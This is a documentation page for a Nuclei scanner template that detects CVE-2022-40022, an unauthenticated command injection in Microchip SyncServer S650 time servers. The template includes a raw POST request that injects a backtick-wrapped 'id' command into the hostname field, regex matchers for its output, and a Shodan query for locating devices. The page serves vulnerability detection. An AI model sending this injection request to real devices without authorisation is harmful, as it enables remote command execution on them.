Symmetricom SyncServer Unauthenticated - Remote Command Execution
ID: CVE-2022-40022
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip
Description
Section titled “Description”Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2022-40022
info: name: Symmetricom SyncServer Unauthenticated - Remote Command Execution author: DhiyaneshDK severity: critical description: | Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device. remediation: | Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2022-40022 - https://www.microsemi.com/campaigns/network-time-servers/S650p/%3Fgd%3D1&id=5&gclid=Cj0KCQjwjbyYBhCdARIsAArC6LL-202ej5YfDB5lMIMSZ2735qjo5yaj2i-PrvLv2Cnh_kIJtFJ0oF8aAlMpEALw_wcB - https://www.microsemi.com/campaigns/network-time-servers/syncserver-s600/?url= - https://www.microsemi.com/document-portal/doc_download/135737-datasheet-syncserver-s650 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-40022 cwe-id: CWE-77 epss-score: 0.77077 epss-percentile: 0.98209 cpe: cpe:2.3:h:microchip:syncserver_s650:-:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: microchip product: syncserver_s650 shodan-query: html:"Symmetricom SyncServer" tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip
http: - raw: - | POST /controller/ping.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/controller/ping.php
currentTab=ping&refreshMode=ðDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping
matchers-condition: and matchers: - type: word part: header words: - "text/html"
- type: regex part: body regex: - "uid=([0-9(a-z)]+)"
- type: status status: - 302# digest: 4b0a004830460221009625c9a7ab5c21bd7b4e090e6138fb016da4349e0bd590a426f8c6fc64bd0af7022100a4a1e30a494a475db870584dfaa8277a0cc329af6e80c16a0dd7d05f538b6fe8:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40022.yaml"